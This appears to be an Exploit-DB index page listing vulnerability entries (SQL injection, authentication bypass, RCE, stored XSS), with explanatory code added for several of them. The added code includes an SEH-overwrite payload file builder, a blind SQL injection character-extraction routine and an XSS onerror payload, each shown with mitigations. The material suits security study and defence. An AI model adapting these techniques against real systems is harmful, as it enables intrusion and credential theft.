Exploitdb Exploits

50,076 exploits tracked across all sources.

EIP-2026-113548 EXPLOITDB text
WordPress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection
by Nguyen Khang
EIP-2026-110111 EXPLOITDB text
Online Healthcare Patient Record Management System 1.0 - Authentication Bypass
by Daniel Monzón
EIP-2026-110110 EXPLOITDB text
Online Healthcare management system 1.0 - Authentication Bypass
by BKpatron
EIP-2026-110097 EXPLOITDB text
Online Examination System 1.0 - 'eid' SQL Injection
by BKpatron
EIP-2026-110067 EXPLOITDB text
Online Chatting System 1.0 - 'id' SQL Injection
by BKpatron
CVE-2020-7209 EXPLOITDB CRITICAL text
HP LinuxKI < 6.0-2 - Remote Code Execution
LinuxKI v6.0-1 and earlier is vulnerable to a remote code execution flaw that is fixed in release 6.0-2.
by Cody Winkler
CVSS 9.8
CVE-2019-3025 EXPLOITDB CRITICAL text
Oracle Food and Beverage Apps (Hospitality RES 3700) 5.7 - RCE
Vulnerability in the Oracle Hospitality RES 3700 component of Oracle Food and Beverage Applications. The supported version that is affected is 5.7. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality RES 3700. While the vulnerability is in Oracle Hospitality RES 3700, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Hospitality RES 3700. CVSS 3.0 Base Score 9.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H).
by Walid Faour
CVSS 9.0
CVE-2020-13118 EXPLOITDB CRITICAL text
Mikrotik Router Monitoring System <= 2018-10-22 - SQL Injection
An issue was discovered in Mikrotik-Router-Monitoring-System through 2018-10-22. SQL Injection exists in check_community.php via the parameter community.
by jul10l1r4
CVSS 9.8
EIP-2026-113009 EXPLOITDB python
vBulletin 5.6.1 - 'nodeId' SQL Injection
by Photubias
CVE-2019-15083 EXPLOITDB MEDIUM text
ManageEngine ServiceDesk Plus < 10500 - Stored Cross-Site Scripting via Workstation Software Name
Default installations of Zoho ManageEngine ServiceDesk Plus 10.0 before 10500 are vulnerable to XSS injected by a workstation local administrator. Using the installed program names of the computer as a vector, the local administrator can execute code on the ManageEngine ServiceDesk administrator's side. At "Asset Home > Server > <workstation> > software" the ManageEngine administrator can see what software is installed on the workstation. This table shows all the installed program names in the Software column. Through this field, a remote attacker can inject malicious code that executes when the ManageEngine administrator views this page.
by Felipe Molina
CVSS 6.1
EIP-2026-117019 EXPLOITDB python
Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)
by gurbanli
EIP-2026-106624 EXPLOITDB text
E-Commerce System 1.0 - Unauthenticated Remote Code Execution
by SunCSR
EIP-2026-106104 EXPLOITDB python
Complaint Management System 1.0 - 'username' SQL Injection
by Daniel Ortiz
EIP-2026-101892 EXPLOITDB text
Netlink XPON 1GE WiFi V2801RGW - Remote Command Execution
by Seecko Das
CVE-2020-37074 EXPLOITDB CRITICAL python
Remote Desktop Audit 2.3.0.157 - RCE
Remote Desktop Audit 2.3.0.157 contains a buffer overflow vulnerability that allows attackers to execute arbitrary code during the Add Computers Wizard file import process. Attackers can craft a malicious payload file to trigger a structured exception handler (SEH) bypass and execute shellcode when importing computer lists.
by gurbanli
CVSS 9.8
CVE-2020-37014 EXPLOITDB MEDIUM text
Tryton 5.4 - Stored Cross-Site Scripting via User Profile Name Input
Tryton 5.4 contains a persistent cross-site scripting vulnerability in the user profile name input that allows remote attackers to inject malicious scripts. Attackers can exploit the vulnerability by inserting script payloads in the name field, which execute in the frontend and backend user interfaces.
by Vulnerability-Lab
CVSS 6.4
CVE-2020-37003 EXPLOITDB MEDIUM text
Sellacious eCommerce 4.6 - Stored Cross-Site Scripting in Manage Your Addresses Module
Sellacious eCommerce 4.6 contains a persistent cross-site scripting vulnerability in the Manage Your Addresses module that allows attackers to inject malicious scripts. Attackers can exploit multiple address input fields like full name, company, and address to execute persistent script code that can hijack user sessions and manipulate application modules.
by Vulnerability-Lab
CVSS 6.4
CVE-2020-37075 EXPLOITDB CRITICAL python
LanSend 3.2 - Remote Code Execution via Add Computers Wizard File Import
LanSend 3.2 contains a buffer overflow vulnerability in the Add Computers Wizard file import functionality that allows remote attackers to execute arbitrary code. Attackers can craft a malicious payload file to trigger a structured exception handler (SEH) overwrite and execute shellcode when importing computers from a file.
by gurbanli
CVSS 9.8
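The two gurbanli entries above (Remote Desktop Audit 2.3.0.157 and LanSend 3.2) describe the same mechanism: an overlong field in an imported computer-list file overwrites a structured exception handler record. The script below is an added illustration of how such a file is laid out, not code from either exploit. The filler length, the POP/POP/RET address and the bad-character set are placeholders: the real values for a given target come from crashing it under a debugger and are not stated on this page.

```python
import struct

# Placeholders (hypothetical): the real offset and gadget address for a given
# target come from a debugger session, not from this page.
OFFSET_TO_NSEH = 1000                   # filler bytes before the next-SEH pointer
POP_POP_RET = 0x41424344                # POP/POP/RET gadget in a module without SafeSEH
NSEH_SHORT_JUMP = b"\xeb\x06\x90\x90"   # JMP SHORT +6: hops over the 4-byte SEH pointer


def build_seh_payload(shellcode, offset=OFFSET_TO_NSEH, seh=POP_POP_RET, nseh=NSEH_SHORT_JUMP):
    """Classic SEH-overwrite layout: filler | nSEH | SEH | shellcode.

    When the overlong field raises an exception, the dispatcher calls SEH
    (the POP/POP/RET gadget), which returns into nSEH; the short jump there
    skips the SEH pointer and lands on the shellcode placed right after it.
    """
    if len(nseh) != 4:
        raise ValueError("nSEH must be exactly 4 bytes")
    return b"A" * offset + nseh + struct.pack("<I", seh) + shellcode


def seh_record(payload, offset=OFFSET_TO_NSEH):
    """Read back (nSEH, SEH) as the exception dispatcher would see them."""
    nseh = payload[offset:offset + 4]
    (seh,) = struct.unpack("<I", payload[offset + 4:offset + 8])
    return nseh, seh


def find_bad_chars(payload, bad=b"\x00\x0a\x0d"):
    """Offsets of bytes a line-oriented importer is likely to mangle (NUL, LF, CR).

    The bad-character set is an assumption for a text computer list; confirm it
    against the real parser before relying on it.
    """
    return [i for i, b in enumerate(payload) if b in bad]


if __name__ == "__main__":
    shellcode = b"\xcc" * 32          # INT3 breakpoints stand in for real shellcode
    payload = build_seh_payload(shellcode)
    with open("computers.txt", "wb") as f:   # the file handed to the Add Computers Wizard
        f.write(payload)
    print(seh_record(payload), find_bad_chars(payload))
```

The jump in nSEH is `+6` because the dispatcher returns to the first byte of nSEH, the `JMP SHORT` itself is two bytes, and the two NOPs plus the four-byte SEH pointer make up the six bytes to skip.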
CVE-2020-37019 EXPLOITDB MEDIUM text
Orchard Core RC1 - Stored Cross-Site Scripting via Blog Post MarkdownBodyPart.Source Parameter
Orchard Core RC1 contains a persistent cross-site scripting vulnerability that allows remote attackers to inject malicious scripts through blog post creation. Attackers can create blog posts with embedded JavaScript in the MarkdownBodyPart.Source parameter to execute arbitrary scripts in victim browsers.
by SunCSR
CVSS 6.4
CVE-2020-11530 EXPLOITDB CRITICAL text
idangero chop_slider - Blind SQL Injection via id GET Parameter
A blind SQL injection vulnerability is present in Chop Slider 3, a WordPress plugin. The vulnerability is introduced in the id GET parameter supplied to get_script/index.php, and allows an attacker to execute arbitrary SQL queries in the context of the WP database user.
by SunCSR
CVSS 9.8
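The Chop Slider entry above (and the Mikrotik check_community.php entry earlier on this page) is a blind injection: the page never echoes query results, so the attacker asks true/false questions and reads the answer from whether a row comes back. The script below is an added example, not the plugin's code or SunCSR's exploit. It stands up an in-memory SQLite database with an invented schema and hash, reproduces the string-concatenation pattern behind an `id` GET parameter, extracts a stored hash one character at a time through the boolean oracle, and shows that the bound-parameter form of the same query does not react to the injected text.

```python
import sqlite3
import string

# Constructed stand-in for the WordPress database: a users table plus a small
# sliders table. Layout, rows and the stored hash are invented for the demo.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT)")
    db.execute("INSERT INTO wp_users VALUES (1, 'admin', '$P$Bsample.hash')")
    db.execute("CREATE TABLE sliders (id INTEGER, script TEXT)")
    db.executemany("INSERT INTO sliders VALUES (?, ?)",
                   [(1, "slider one"), (2, "slider two")])
    return db


def vulnerable_get_script(db, id_param):
    """The bug class: the `id` GET parameter is pasted into the query text."""
    sql = f"SELECT script FROM sliders WHERE id = {id_param}"
    return db.execute(sql).fetchall()


def safe_get_script(db, id_param):
    """Hardened form: the value is bound, so it is compared, never parsed as SQL."""
    return db.execute("SELECT script FROM sliders WHERE id = ?", (id_param,)).fetchall()


def oracle(db, condition):
    """Boolean oracle: a row comes back only when the injected condition is true."""
    return len(vulnerable_get_script(db, f"1 AND ({condition})")) > 0


CHARSET = string.ascii_letters + string.digits + "$./"


def extract_blind(db, subquery, max_len=64):
    """Recover the result of `subquery` one character at a time via the oracle."""
    secret = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            if oracle(db, f"substr(({subquery}), {pos}, 1) = '{ch}'"):
                secret += ch
                break
        else:
            break  # no character matched: past the end of the string
    return secret


if __name__ == "__main__":
    db = make_db()
    print(extract_blind(db, "SELECT user_pass FROM wp_users WHERE ID = 1"))
    print(safe_get_script(db, "1 AND 1=1"))  # bound as one literal: no row matches
```

Each recovered character costs up to `len(CHARSET)` requests, which is why real tooling switches to a binary search over character codes; the linear scan is kept here so the oracle logic stays visible. The subquery runs as the database user the application connects with, which for a WordPress plugin is the full WP database user named in the entry.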
EIP-2026-111615 EXPLOITDB text
qdPM 9.1 - Arbitrary File Upload
by Besim
EIP-2026-106309 EXPLOITDB text
CuteNews 2.1.2 - Authenticated Arbitrary File Upload
by Nhat Ha
EIP-2026-103377 EXPLOITDB python
MacOS 320.whatis Script - Privilege Escalation
by Csaba Fitzl
CVE-2019-16112 EXPLOITDB HIGH python
TylerTech Eagle 2018.3.11 - Remote Code Execution via Untrusted Java Deserialization
TylerTech Eagle 2018.3.11 deserializes untrusted user input, resulting in remote code execution via a crafted Java object to the recorder/ServiceManager?service=tyler.empire.settings.SettingManager URI.
by Anthony Cole
CVSS 8.8
CVE-2019-15253 EXPLOITDB MEDIUM text
Cisco Catalyst Center < 1.3.0.6 - Authenticated Stored Cross-Site Scripting
A vulnerability in the web-based management interface of Cisco Digital Network Architecture (DNA) Center could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker needs administrator credentials. This vulnerability affects Cisco DNA Center Software releases earlier than 1.3.0.6 and 1.3.1.4.
by Dylan Garnaud
CVSS 4.8
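Five entries on this page (ManageEngine ServiceDesk Plus, Tryton, Sellacious, Orchard Core and Cisco DNA Center) are stored cross-site scripting in an administrative view: a value saved by a low-privilege user or a managed workstation is later rendered into an administrator's page without output encoding. The code below is an added example of the fix, not from any of those products. It uses the ManageEngine scenario (a software inventory table) with constructed rows, and shows why the encoder must match the output context: HTML entity encoding is right for a table cell or attribute, but data handed to page JavaScript needs a JavaScript-string encoder instead.

```python
import html
import json
import re

# Constructed inventory rows, standing in for program names a workstation reports
# back to the management server. The second name is attacker-controlled.
INVENTORY = [
    {"host": "WS-01", "software": "7-Zip 19.00"},
    {"host": "WS-02", "software": '<img src=x onerror="fetch(\'/export\')">'},
]


def esc_text(s):
    """HTML text and attribute context: &, <, >, \" and ' become entities."""
    return html.escape(s, quote=True)


def esc_js(s):
    """JavaScript string-literal context: JSON-encode, then hex-escape the HTML
    metacharacters so a value like </script> cannot close the script element."""
    return (json.dumps(s)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_software_table(rows, escape=True):
    """The Software column of an asset page; escape=False reproduces the bug class."""
    f = esc_text if escape else (lambda s: s)
    body = "".join(
        f'<tr><td>{f(r["host"])}</td><td title="{f(r["software"])}">{f(r["software"])}</td></tr>'
        for r in rows)
    return f"<table>{body}</table>"


def render_inline_script(rows):
    """The same data handed to page JavaScript; needs esc_js, not esc_text."""
    names = ", ".join(esc_js(r["software"]) for r in rows)
    return f"<script>var software = [{names}];</script>"


def has_raw_markup(rendered, template_tags=("table", "tr", "td", "script")):
    """Crude check: any tag name in the output that the template did not emit."""
    found = re.findall(r"<\s*/?\s*([a-zA-Z]+)", rendered)
    return any(t.lower() not in template_tags for t in found)


if __name__ == "__main__":
    print(render_software_table(INVENTORY, escape=False))   # the vulnerable page
    print(render_software_table(INVENTORY))                 # the fixed page
    print(render_inline_script(INVENTORY))
```

`has_raw_markup` is only a regression check for this demo; in production the guarantee comes from the template engine auto-escaping by context, and a Content-Security-Policy that blocks inline script limits the damage when an encoder is missed.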